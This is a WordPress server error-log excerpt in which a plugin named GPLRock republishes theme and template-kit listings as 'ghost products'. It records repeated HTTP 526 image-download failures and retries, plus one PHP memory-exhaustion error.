12:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anycar---automotive-dealership-wordpress-theme-24485.webp for product anycar-automotive-dealership-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:01 UTC] GPLRock: Image download failed for product anycar-automotive-dealership-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:03 UTC] GPLRock: Image download failed for product anycar-automotive-dealership-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anycar---automotive-dealership-wordpress-theme-24485.webp for product anycar-automotive-dealership-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:05 UTC] GPLRock WARNING: Image download failed for product anycar-automotive-dealership-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anycar---automotive-dealership-wordpress-theme-24485.webp [15-Mar-2026 12:25:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anycar-automotive-dealership-wordpress-theme [15-Mar-2026 12:25:05 UTC] GPLRock: Image download failed for product renroll-scooter-bike-rentals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:08 UTC] GPLRock: Image download failed for product renroll-scooter-bike-rentals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renroll---scooter--bike-rentals-wordpress-theme-33347.webp for product renroll-scooter-bike-rentals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:10 UTC] GPLRock: Image download failed for product renroll-scooter-bike-rentals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:12 UTC] GPLRock: Image download failed for product renroll-scooter-bike-rentals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renroll---scooter--bike-rentals-wordpress-theme-33347.webp for product renroll-scooter-bike-rentals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:14 UTC] GPLRock WARNING: Image download failed for product renroll-scooter-bike-rentals-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/renroll---scooter--bike-rentals-wordpress-theme-33347.webp [15-Mar-2026 12:25:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: renroll-scooter-bike-rentals-wordpress-theme [15-Mar-2026 12:25:14 UTC] GPLRock: Image download failed for product dimita-electronics-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:16 UTC] GPLRock: Image download failed for product dimita-electronics-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dimita--electronics-wordpress-theme-for-woocommerce-24995.webp for product dimita-electronics-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:18 UTC] GPLRock: Image download failed for product dimita-electronics-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:21 UTC] GPLRock: Image download failed for product dimita-electronics-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:25:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dimita--electronics-wordpress-theme-for-woocommerce-24995.webp for product dimita-electronics-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:25:23 UTC] GPLRock WARNING: Image download failed for product dimita-electronics-wordpress-theme-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/dimita--electronics-wordpress-theme-for-woocommerce-24995.webp [15-Mar-2026 12:25:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dimita-electronics-wordpress-theme-for-woocommerce [15-Mar-2026 12:25:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/rank-plus/includes/mycred-rank-plus-module.php on line 797 [15-Mar-2026 13:08:53 UTC] GPLRock: Image downloaded successfully for product izeetak-it-solutions-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de01f6e0.webp [15-Mar-2026 13:08:53 UTC] GPLRock: Using pre-downloaded image for product izeetak-it-solutions-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de01f6e0.webp [15-Mar-2026 13:08:53 UTC] GPLRock: Ghost product published with image - Product ID: izeetak-it-solutions-services-elementor-template-kit [15-Mar-2026 13:08:54 UTC] GPLRock: Image downloaded successfully for product ivent-event-conference-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b774e55f.webp [15-Mar-2026 13:08:54 UTC] GPLRock: Using pre-downloaded image for product ivent-event-conference-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b774e55f.webp [15-Mar-2026 13:08:54 UTC] GPLRock: Ghost product published with image - Product ID: ivent-event-conference-elementor-template-kit [15-Mar-2026 13:08:55 UTC] GPLRock: Image downloaded successfully for product itsmykit-dark-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26ff779.webp [15-Mar-2026 13:08:56 UTC] GPLRock: Using pre-downloaded image for product itsmykit-dark-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26ff779.webp [15-Mar-2026 13:08:56 UTC] GPLRock: Ghost product published with image - Product ID: itsmykit-dark-creative-portfolio-elementor-template-kit [15-Mar-2026 13:08:57 UTC] GPLRock: Image downloaded successfully for product italk-event-conference-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-edf71d4a.jpg [15-Mar-2026 13:08:57 UTC] GPLRock: Using pre-downloaded image for product italk-event-conference-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-edf71d4a.jpg [15-Mar-2026 13:08:57 UTC] GPLRock: Ghost product published with image - Product ID: italk-event-conference-elementor-template-kit [15-Mar-2026 13:08:58 UTC] GPLRock: Image downloaded successfully for product ipodcast-modern-podcast-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1231b743.webp [15-Mar-2026 13:08:58 UTC] GPLRock: Using pre-downloaded image for product ipodcast-modern-podcast-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1231b743.webp [15-Mar-2026 13:08:58 UTC] GPLRock: Ghost product published with image - Product ID: ipodcast-modern-podcast-elementor-template-kit [15-Mar-2026 13:09:00 UTC] GPLRock: Image downloaded successfully for product intra-modern-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bdd8d397.webp [15-Mar-2026 13:09:00 UTC] GPLRock: Using pre-downloaded image for product intra-modern-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bdd8d397.webp [15-Mar-2026 13:09:00 UTC] GPLRock: Ghost product published with image - Product ID: intra-modern-digital-agency-elementor-template-kit [15-Mar-2026 13:09:01 UTC] GPLRock: Image downloaded successfully for product intify-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-680f3694.webp [15-Mar-2026 13:09:01 UTC] GPLRock: Using pre-downloaded image for product intify-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-680f3694.webp [15-Mar-2026 13:09:01 UTC] GPLRock: Ghost product published with image - Product ID: intify-real-estate-elementor-template-kit [15-Mar-2026 13:09:02 UTC] GPLRock: Image downloaded successfully for product intervin-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a88ff13d.webp [15-Mar-2026 13:09:02 UTC] GPLRock: Using pre-downloaded image for product intervin-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a88ff13d.webp [15-Mar-2026 13:09:02 UTC] GPLRock: Ghost product published with image - Product ID: intervin-real-estate-elementor-template-kit [15-Mar-2026 13:09:03 UTC] GPLRock: Image download failed for product interia-interior-design-service-elementor-template-kit (attempt 1/3). HTTP Code: 200, Error: . Retrying... [15-Mar-2026 13:09:06 UTC] GPLRock: Image download failed for product interia-interior-design-service-elementor-template-kit (attempt 2/3). HTTP Code: 200, Error: . Retrying... [15-Mar-2026 13:09:09 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/Interia-Interior-Design-Service-Elementor-Template-Kit.webp for product interia-interior-design-service-elementor-template-kit after 3 attempts. HTTP Code: 200, Error: [15-Mar-2026 13:09:11 UTC] GPLRock: Image download failed for product interia-interior-design-service-elementor-template-kit (attempt 1/3). HTTP Code: 200, Error: . Retrying... [15-Mar-2026 13:09:14 UTC] GPLRock: Image download failed for product interia-interior-design-service-elementor-template-kit (attempt 2/3). HTTP Code: 200, Error: . Retrying... [15-Mar-2026 13:09:16 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/Interia-Interior-Design-Service-Elementor-Template-Kit.webp for product interia-interior-design-service-elementor-template-kit after 3 attempts. HTTP Code: 200, Error: [15-Mar-2026 13:09:16 UTC] GPLRock WARNING: Image download failed for product interia-interior-design-service-elementor-template-kit. URL: https://www.gplrock.com/wp-content/uploads/2023/12/Interia-Interior-Design-Service-Elementor-Template-Kit.webp [15-Mar-2026 13:09:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interia-interior-design-service-elementor-template-kit [15-Mar-2026 13:09:18 UTC] GPLRock: Image downloaded successfully for product interi-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e045343.webp [15-Mar-2026 13:09:18 UTC] GPLRock: Using pre-downloaded image for product interi-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e045343.webp [15-Mar-2026 13:09:18 UTC] GPLRock: Ghost product published with image - Product ID: interi-interior-design-elementor-template-kit [15-Mar-2026 13:09:23 UTC] GPLRock: Image downloaded successfully for product biolife-organic-food-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fc3d81f.jpg [15-Mar-2026 13:09:23 UTC] GPLRock: Using pre-downloaded image for product biolife-organic-food-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fc3d81f.jpg [15-Mar-2026 13:09:24 UTC] GPLRock: Ghost product published with image - Product ID: biolife-organic-food-wordpress-theme [15-Mar-2026 13:09:25 UTC] GPLRock: Image downloaded successfully for product efpose-multipurpose-blog-and-newspaper-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4734b581.jpg [15-Mar-2026 13:09:25 UTC] GPLRock: Using pre-downloaded image for product efpose-multipurpose-blog-and-newspaper-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4734b581.jpg [15-Mar-2026 13:09:25 UTC] GPLRock: Ghost product published with image - Product ID: efpose-multipurpose-blog-and-newspaper-theme [15-Mar-2026 13:09:27 UTC] GPLRock: Image downloaded successfully for product spalab-beauty-salon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d5fa502.png [15-Mar-2026 13:09:27 UTC] GPLRock: Using pre-downloaded image for product spalab-beauty-salon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d5fa502.png [15-Mar-2026 13:09:27 UTC] GPLRock: Ghost product published with image - Product ID: spalab-beauty-salon-wordpress-theme [15-Mar-2026 13:09:28 UTC] GPLRock: Image downloaded successfully for product reload-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9280b9ac.jpg [15-Mar-2026 13:09:29 UTC] GPLRock: Using pre-downloaded image for product reload-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9280b9ac.jpg [15-Mar-2026 13:09:29 UTC] GPLRock: Ghost product published with image - Product ID: reload-responsive-multi-purpose-wordpress-theme [15-Mar-2026 13:09:30 UTC] GPLRock: Image downloaded successfully for product kids-care-children-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e17278b.jpg [15-Mar-2026 13:09:30 UTC] GPLRock: Using pre-downloaded image for product kids-care-children-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e17278b.jpg [15-Mar-2026 13:09:30 UTC] GPLRock: Ghost product published with image - Product ID: kids-care-children-wordpress-theme [15-Mar-2026 13:09:32 UTC] GPLRock: Image downloaded successfully for product tattoopress-a-wordpress-theme-for-ink-artists (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e18f757.jpg [15-Mar-2026 13:09:32 UTC] GPLRock: Using pre-downloaded image for product tattoopress-a-wordpress-theme-for-ink-artists: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e18f757.jpg [15-Mar-2026 13:09:32 UTC] GPLRock: Ghost product published with image - Product ID: tattoopress-a-wordpress-theme-for-ink-artists [15-Mar-2026 13:09:33 UTC] GPLRock: Image downloaded successfully for product portnex-creative-portfolio-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70c8f9a8.jpg [15-Mar-2026 13:09:33 UTC] GPLRock: Using pre-downloaded image for product portnex-creative-portfolio-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70c8f9a8.jpg [15-Mar-2026 13:09:33 UTC] GPLRock: Ghost product published with image - Product ID: portnex-creative-portfolio-agency-elementor-template-kit [15-Mar-2026 13:09:34 UTC] GPLRock: Image downloaded successfully for product tolkio-ai-virtual-assistance-app-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e18f5887.jpg [15-Mar-2026 13:09:34 UTC] GPLRock: Using pre-downloaded image for product tolkio-ai-virtual-assistance-app-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e18f5887.jpg [15-Mar-2026 13:09:34 UTC] GPLRock: Ghost product published with image - Product ID: tolkio-ai-virtual-assistance-app-elementor-template-kit [15-Mar-2026 13:09:36 UTC] GPLRock: Image downloaded successfully for product qohwa-coffee-shop-store-ecommerce-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ccadb2b.png [15-Mar-2026 13:09:37 UTC] GPLRock: Using pre-downloaded image for product qohwa-coffee-shop-store-ecommerce-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ccadb2b.png [15-Mar-2026 13:09:37 UTC] GPLRock: Ghost product published with image - Product ID: qohwa-coffee-shop-store-ecommerce-elementor-pro-template-kit [15-Mar-2026 13:09:38 UTC] GPLRock: Image downloaded successfully for product petopio-pet-grooming-vetenary-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a276c5b4.jpg [15-Mar-2026 13:09:38 UTC] GPLRock: Using pre-downloaded image for product petopio-pet-grooming-vetenary-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a276c5b4.jpg [15-Mar-2026 13:09:38 UTC] GPLRock: Ghost product published with image - Product ID: petopio-pet-grooming-vetenary-elementor-template-kit [15-Mar-2026 13:17:06 UTC] GPLRock: Image download failed for product digita-wp-single-category-products-woocommerce-parallax-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:08 UTC] GPLRock: Image download failed for product digita-wp-single-category-products-woocommerce-parallax-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digita-wp---single-category-products-woocommerce-parallax-theme-12113.webp for product digita-wp-single-category-products-woocommerce-parallax-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:10 UTC] GPLRock: Image download failed for product digita-wp-single-category-products-woocommerce-parallax-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:12 UTC] GPLRock: Image download failed for product digita-wp-single-category-products-woocommerce-parallax-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digita-wp---single-category-products-woocommerce-parallax-theme-12113.webp for product digita-wp-single-category-products-woocommerce-parallax-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:14 UTC] GPLRock WARNING: Image download failed for product digita-wp-single-category-products-woocommerce-parallax-theme. URL: https://meldwp.com/wp-content/uploads/digita-wp---single-category-products-woocommerce-parallax-theme-12113.webp [15-Mar-2026 13:17:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digita-wp-single-category-products-woocommerce-parallax-theme [15-Mar-2026 13:17:14 UTC] GPLRock: Image download failed for product dental-care-teeth-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:17 UTC] GPLRock: Image download failed for product dental-care-teeth-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dental-care---teeth-clinic-wordpress-theme-4532.webp for product dental-care-teeth-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:19 UTC] GPLRock: Image download failed for product dental-care-teeth-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:21 UTC] GPLRock: Image download failed for product dental-care-teeth-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dental-care---teeth-clinic-wordpress-theme-4532.webp for product dental-care-teeth-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:23 UTC] GPLRock WARNING: Image download failed for product dental-care-teeth-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dental-care---teeth-clinic-wordpress-theme-4532.webp [15-Mar-2026 13:17:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dental-care-teeth-clinic-wordpress-theme [15-Mar-2026 13:17:23 UTC] GPLRock: Image download failed for product aether-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:25 UTC] GPLRock: Image download failed for product aether-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aether---ai-agency--technology-wordpress-theme-14848.webp for product aether-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:28 UTC] GPLRock: Image download failed for product aether-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:30 UTC] GPLRock: Image download failed for product aether-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aether---ai-agency--technology-wordpress-theme-14848.webp for product aether-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:32 UTC] GPLRock WARNING: Image download failed for product aether-ai-agency-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aether---ai-agency--technology-wordpress-theme-14848.webp [15-Mar-2026 13:17:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aether-ai-agency-technology-wordpress-theme [15-Mar-2026 13:17:32 UTC] GPLRock: Image download failed for product tabligh-islamic-institute-mosque-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:34 UTC] GPLRock: Image download failed for product tabligh-islamic-institute-mosque-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tabligh---islamic-institute--mosque-wordpress-theme--rtl-25362.webp for product tabligh-islamic-institute-mosque-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:36 UTC] GPLRock: Image download failed for product tabligh-islamic-institute-mosque-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:38 UTC] GPLRock: Image download failed for product tabligh-islamic-institute-mosque-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tabligh---islamic-institute--mosque-wordpress-theme--rtl-25362.webp for product tabligh-islamic-institute-mosque-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:40 UTC] GPLRock WARNING: Image download failed for product tabligh-islamic-institute-mosque-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/tabligh---islamic-institute--mosque-wordpress-theme--rtl-25362.webp [15-Mar-2026 13:17:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tabligh-islamic-institute-mosque-wordpress-theme-rtl [15-Mar-2026 13:17:41 UTC] GPLRock: Image download failed for product iniya-beauty-store-cosmetic-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:43 UTC] GPLRock: Image download failed for product iniya-beauty-store-cosmetic-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iniya---beauty-store-cosmetic-theme-12451.webp for product iniya-beauty-store-cosmetic-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:45 UTC] GPLRock: Image download failed for product iniya-beauty-store-cosmetic-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:47 UTC] GPLRock: Image download failed for product iniya-beauty-store-cosmetic-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iniya---beauty-store-cosmetic-theme-12451.webp for product iniya-beauty-store-cosmetic-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:49 UTC] GPLRock WARNING: Image download failed for product iniya-beauty-store-cosmetic-theme. URL: https://meldwp.com/wp-content/uploads/iniya---beauty-store-cosmetic-theme-12451.webp [15-Mar-2026 13:17:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: iniya-beauty-store-cosmetic-theme [15-Mar-2026 13:17:49 UTC] GPLRock: Image download failed for product halstein-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:51 UTC] GPLRock: Image download failed for product halstein-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halstein---business-consulting-wordpress-theme-19939.webp for product halstein-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:54 UTC] GPLRock: Image download failed for product halstein-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:56 UTC] GPLRock: Image download failed for product halstein-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:17:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halstein---business-consulting-wordpress-theme-19939.webp for product halstein-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:17:58 UTC] GPLRock WARNING: Image download failed for product halstein-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/halstein---business-consulting-wordpress-theme-19939.webp [15-Mar-2026 13:17:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: halstein-business-consulting-wordpress-theme [15-Mar-2026 13:17:58 UTC] GPLRock: Image download failed for product campelos-a-beautifully-crafted-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:00 UTC] GPLRock: Image download failed for product campelos-a-beautifully-crafted-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/campelos---a-beautifully-crafted-blog-wordpress-theme-13527.webp for product campelos-a-beautifully-crafted-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:03 UTC] GPLRock: Image download failed for product campelos-a-beautifully-crafted-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:05 UTC] GPLRock: Image download failed for product campelos-a-beautifully-crafted-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/campelos---a-beautifully-crafted-blog-wordpress-theme-13527.webp for product campelos-a-beautifully-crafted-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:07 UTC] GPLRock WARNING: Image download failed for product campelos-a-beautifully-crafted-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/campelos---a-beautifully-crafted-blog-wordpress-theme-13527.webp [15-Mar-2026 13:18:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: campelos-a-beautifully-crafted-blog-wordpress-theme [15-Mar-2026 13:18:07 UTC] GPLRock: Image download failed for product bredh-multipurpose-web-hosting-with-whmcs-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:09 UTC] GPLRock: Image download failed for product bredh-multipurpose-web-hosting-with-whmcs-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bredh---multipurpose-web-hosting-with-whmcs-template-15890.webp for product bredh-multipurpose-web-hosting-with-whmcs-template after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:11 UTC] GPLRock: Image download failed for product bredh-multipurpose-web-hosting-with-whmcs-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:13 UTC] GPLRock: Image download failed for product bredh-multipurpose-web-hosting-with-whmcs-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bredh---multipurpose-web-hosting-with-whmcs-template-15890.webp for product bredh-multipurpose-web-hosting-with-whmcs-template after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:15 UTC] GPLRock WARNING: Image download failed for product bredh-multipurpose-web-hosting-with-whmcs-template. URL: https://meldwp.com/wp-content/uploads/bredh---multipurpose-web-hosting-with-whmcs-template-15890.webp [15-Mar-2026 13:18:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bredh-multipurpose-web-hosting-with-whmcs-template [15-Mar-2026 13:18:16 UTC] GPLRock: Image download failed for product flatpack-multipurpose-unbounce-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:18 UTC] GPLRock: Image download failed for product flatpack-multipurpose-unbounce-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatpack---multipurpose-unbounce-pack-21575.webp for product flatpack-multipurpose-unbounce-pack after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:20 UTC] GPLRock: Image download failed for product flatpack-multipurpose-unbounce-pack (attempt 1/3). HTTP Code: 526, Error: . 